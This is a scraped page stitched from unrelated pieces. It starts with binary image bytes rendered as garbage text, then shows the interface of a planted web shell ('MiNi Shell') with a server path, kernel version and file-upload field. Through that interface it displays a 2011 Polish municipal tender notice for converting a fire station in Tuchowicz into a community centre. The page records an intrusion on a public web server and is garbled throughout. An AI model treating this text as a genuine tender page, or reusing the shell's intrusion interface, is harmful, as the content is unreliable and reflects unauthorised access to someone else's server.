JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110308/38852-N-2011.html

<p class="kh_header"><b>Stanin: Rozbudowa i przebudowa budynku Ochotniczej Straży Pożarnej na   
Centrum Społeczno-Kulturalne w miejscowości Tuchowicz</b><br>
<b>Numer ogłoszenia: 38852 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Stanin , 62/5, 21-422 Stanin, woj. lubelskie, tel. 025 7961551, faks 025 7981118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stanin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa budynku Ochotniczej Straży Pożarnej na   
Centrum Społeczno-Kulturalne w miejscowości Tuchowicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowane przedsięwzięcie polega na przebudowie i rozbudowie istniejącego budynku gminnego, pełniącego obecnie funkcję  remizy OSP. 
Budynek będący przedmiotem projektu budowlanego zlokalizowany jest na działce inwestora o numerze ewidencyjnym 501/2, położonej w miejscowości Tuchowicz
Działka posiada bezpośredni dostęp do drogi  publicznej wojewódzkiej nr 807 relacji Maciejowice  -Sobolew -Żelechów -Łuków  o nawierzchni asfaltowej. Obsługa komunikacyjne działki na  warunkach dotychczasowych, poprzez istniejący zjazd z drogi wojewódzkiej.
Obecnie na działce znajduje się przedmiotowy budynek OSP oraz budynek gospodarczy
Projektuje się rozbudowę budynku Ochotniczej Straży Pożarnej w Tuchowiczu na Centrum Społęczno-Kulturalne
Projektuje się wykonanie niezbędnych przyłączy zgodnie z planszą zagospodarowania terenu oraz załączonymi warunkami.
Poza istniejącą i projektowaną zabudową oraz utwardzonymi placami projektuję się zachowanie istniejących powierzchni zielonych, które to stanowią powierzchnię biologicznie czynną.
Budynek przeznaczony będzie dla potrzeb Centrum Społeczno-Kulturalnego w Tuchowiczu oraz częściowo dla potrzeb organizacyjnych Ochotniczej Straży Pożarnej w Tuchowiczu.
W budynku znajdą się  takie pomieszczenia jak: pomieszczenie socjalne, pomieszczenie higieniczno - sanitarne, świetlica, komunikacja oraz pomieszczenia garażowe.
Obiekt jest budynkiem jednokondygnacyjnym niepodpiwniczonym. Budynek wykonany w technologii tradycyjnej o ścianach murowanych z  gazobetonu gr. 24cm. Ściany ocieplone styropianem EPS70-04  gr.12cm np. w systemie Atlas Stopter.
Budynek przekryty jest dachem dwuspadowym o pokryciu z blachy płaskiej na rąbek stojący np. Classic f-my Ruukki.
Konstrukcja dachu drewniana tradycyjna.
Wszystkie elementy drewniane poddasza należy zaimpregnować środkiem grzybobójczym i zabezpieczyć przed działaniem ognia preparatem Fobos M-4.
Dach odwadniany jest poprzez tradycyjny grawitacyjny system odprowadzenia wód opadowych tj. rynny i rury spustowe stalowe.
Konstrukcja budynku typowa. Fundamenty posadowione bezpośrednio na nośnym gruncie. 

Bryłę całości  budynku stanowią trzy niezależne prostopadłościany  nakryte dachem dwuspadowym.
Z uwagi na planowaną rozbudowę należy wykonać szereg robót a w szczególności:
	Rozbiórkę w miejscu rozbudowy części środkowej istniejącego budynku wraz ze stropem i pokryciem dachowym
	Wykonanie docieplenia ścian zewnętrznych styropianem EPS 70-04   gr. 12cm
	Wykonanie docieplenia stropu ostatniej kondygnacji wełną mineralną 15cm
	Wykonanie stropu żelbetowego typu Teriva 4.0/1 gr. 24cm wraz z wykonaniem wieńców żelbetowych
	Wykonanie nowych podłóż i posadzek
	Miejscowe skucia i naprawy oraz przecierki tynków wewnętrznych
	Wykonanie nowych oblicowań ściennych z płytek glazurowanych
	Wykonanie nowych wymalowań z farb zmywalnych odpornych na zabrudzenia
	Wykonanie instalacji kanalizacyjnej, wodnej, centralnego ogrzewania, instalacji gazowej  oraz instalacji elektrycznej
	I inne

ZESTAWIENIE PODSTAWOWYCH DANYCH TECHNICZNYCH:
Podstawowe dane liczbowe:

Powierzchnia zabudowy budynku	                              389,78	m2
Powierzchnia całkowita  budynku	                              401,69	m2
Powierzchnia wewnętrzna budynku	                               354,07	m2
Powierzchnia użytkowa budynku	                               337,79	m2
Kubatura 	                                                                              2 284,00	m3
W tym:
-powierzchnia użytkowa projektowana  - 123,72m2
-powierzchnia użytkowa istniejąca        - 214,56 m2
-powierzchnia zabudowy projektowana - 139,13m2
-powierzchnia zabudowy istniejąca       - 250,65 m2
-kubatura projektowana -                      1076,00m3
-kubatura istniejąca       -                          1208 m3
-  	roboty rozbiórkowe i demontażowe; 
- 	wykonanie nowych podłóg i posadzek wraz ze wyrównaniem zróżnicowanych  poziomów posadzek oraz wykonaniem izolacji przeciwwilgociowych podposadzkowych;
- 	przecierka istniejących tynków oraz wykonanie nowych cementowo-wapiennych;
- 	wykonanie nowych oblicowań ściennych glazurowanych;
- 	wykonanie nowych wymalowań malarskich;
- 	roboty murowe (zamurowania i nowe ścianki działowe);
- 	wymiana stolarki okiennej i drzwiowej;
- 	docieplenie ścian;
- 	docieplenie stropu;
- 	wykonanie nowych schodów zewnętrznych i pochylni dla niepełnosprawnych;
- 	wymiana obróbek blacharskich;
- 	wymiana odwodnienia połaci dachowych;
- 	oczyszczenie i udrożnienie, z lokalnym odnowieniem i przemurowaniem, kominów;
- 	remont instalacji elektrycznej;
- 	wykonanie instalacji wodno-kanalizacyjnej;
-	wykonanie instalacji ogrzewania.
Instalacje sanitarne.
Zakres opracowania obejmuje:
- Instalacja centralnego ogrzewania wykonana z rur polipropylenowych STABI łączonych przez zgrzewanie i rur miedzianych. 
- Grzejniki stalowe płytowe z wbudowanymi zaworami termostatycznymi z nastawą wstępną.
- Instalacja zimnej wody wykonana z rur polipropylenowych łączonych przez zgrzewanie.
- Instalacja ciepłej wody i cyrkulacji wykonana z rur polipropylenowych STABI łączonych przez zgrzewanie.
- Baterie umywalkę i zlewozmywakowe stojące jedno uchwytowe.
- Instalacja kanalizacji sanitarnej wykonana z rur PCV łączonych na wcisk.
- Umywalki na pół postumentach
- Miski ustępowe typu kompakt
- Pisuar z zaworem automatycznym spłukującym
- Zlewozmywak 2-komorowy ze stali szlachetnej na szafce
- Instalacja wentylacji mechanicznej nawiewna i wywiewna wykonana na wentylatorach kanałowych i dachowych oraz ściennych 
-Źródłem ciepła jest projektowana kotłownia gazowa zlokalizowana w budynku.
- Instalacja gazowa wykonana z rur stalowych czarnych bez szwu łączonych za pomocą spawania.
- Kuchnia gazowa 4-palnikowa z piekarnikiem, łączona przewodem elastycznym
- Kocioł gazowy wiszący z zasobnikiem, z modulowanym palnikiem w komplecie z regulatorem pogodowym.
- Spaliny odprowadzone przewodem powietrzno - spalinowym współosiowym nad dach budynku
- Dla obiegu grzewczego zaprojektowano pompę obiegową do CO elektroniczną.
- Dla obiegu cyrkulacji ciepłej wody zaprojektowano pompę sterowaną zegarem.
Przyłącza i roboty zewnętrzne.
- Przyłącze wody x rur PE40 = 4,5m
- Opaska NWZ100/2 =1kpl
- Wodomierz skrzydełkowy dn25 =1szt
- Zawory kulowe dn32=2szt
- zawór zwrotny antyskażeniowy dn32=1szt
- Przyłącze kanalizacji z rur PCV160=15m
- Studnia z kręgów betonowych Dn1000=1kpl
- Szambo PEHD SPIRO, V-5m3 = 1szt
Instalacje elektryczne.
Budynek jest zasilany w energię elektryczną przyłączem napowietrznym n.n. 4 x Al. 16 ze słupa nr 6/80 napowietrznej linii n.n. 
Na zewnątrz budynku zabudowane jest złącze bezpiecznikowe. Istniejąca moc przyłączeniowa 3 kW. Układ pomiarowy zainstalowany jest wewnątrz budynku.
Tablice rozdzielcze , wlz .
Złącza montować na wysokości 1.4 m od podłogi. Tablice rozdzielcze wyposażyć w zamki na klucz. Wlz zasilające poszczególne tablice wykonać przewodami miedzianymi  umieszczonymi p/t wg opisów na planach. 
Instalacja oświetlenia podstawowego i gniazd wtyczkowych 1-fazowych.
Całość instalacji  oświetleniowej wykonać przewodami miedzianymi typu YDYp 3 x 1.5mm? lub YDYp 4 x1.5mm? jako pt  750V z osprzętem pt
Projektuje się oprawy świetlówkowe we wszystkich pomieszczeniach oprócz sanitariatów 
i pomieszczeń zaplecza. 
Instalację gniazd wtykowych 1-faz. wykonać przewodami YDYp 3 x 2.5 mm? 750 V  umieszczonymi pt z osprzętem pt, wszystkie gniazda za stykiem ochronnym.  
W pomieszczeniach przejściowo wilgotnych takich jak sanitariaty, zaplecza kuchenne  zastosować łączniki i gniazda wtyczkowe jako bryzgoodporne o stopniu IP 44
Oświetlenie awaryjne.
Nalezy zastosować oprawy  wyposażone w moduły zasilania awaryjnego 3h.
Do opraw tych doprowadzić dodatkowy przewód fazowy. Oprawy załączają się automatycznie w chwili zaniku zasilania w obwodzie z  którego są zasilane. 
Czas podtrzymania w przypadku zaniku napięcia w sieci - 3 godz..  
Zasilanie instalacji z obwodów oświetlenia podstawowego i tablic rozdzielczych. 
Instalację  oświetleniową wykonać jako pt przewodami miedzianymi typu  YDYp 4 x1.5 mm 750V  z osprzętem pt. 
Oświetlenie zewnętrzne.
Na zewnętrznych ścianach budynku nad wejściami do budynku zabudować oprawy . Zasilanie wykonać przewodem YDYp 3-5x1,5 pt. Uruchamianie oświetlenia nad wejściami ręcznie. 
Instalacja telefoniczna.
Szczegółowy opis przedmiotu zamówienia stanowi przedmiar robót, dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium. 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 15.000,00, słownie: piętnascie tysięcy złotych 0/100.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu -przelewem pieniężnym na rachunek bankowy: 
Bank Spółdzielczy Łuków O/Stanin
35 9204 1011 0000 0101 2000 0040
z adnotacją wadium - Rozbudowa i przebudowa budynku OSP na Centrum Społeczno- Kulturalne w miejscowości Tuchowicz
Wadium należy wnieść przed upływem terminu do składania ofert. 
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)w gwarancjach bankowych, 
4)w gwarancjach ubezpieczeniowych, 
5)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45  i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2 robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości nie mniejszej niż 500.000,00 złotych brutto każda, polegających na budowie, przebudowie lub remoncie budynku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:
a) termin może ulec zmianie w przypadku:
- niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych które mają wpływ na realizację zamówienia publicznego,
- przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione.
- wystąpienia okoliczności nie zawinionych przez strony, których nie można było wcześniej przewidzieć,
- zmian dokumentacji projektowej dokonanych na wniosek Zamawiającego (lub Wykonawcy)
b) w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego.
c) wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stanin.pl zakładka e-bip zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Staninie  Stanin 62 21-422 Stanin pokój nr.5 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2011 godzina 09:30, miejsce: Urząd  Gminy w Staninie 
Stanin 62 
21-422 Stanin sekretariat pokój nr 5 /I piętro/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Unii Europejskiej w ramach działania  W RAMACH DZIAŁANIA 413 WDRAŻANIE LOKALNYCH STRATEGII ROZWOJU W ZAKRESIE OPERACJI ODPOWIADAJĄCYCH WARUNKOM PRZYZNANIA POMOCY W RAMACH DZIAŁANIA ODNOWA I ROZWÓJ WSI OBJĘTEGO PROW NA LATA 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com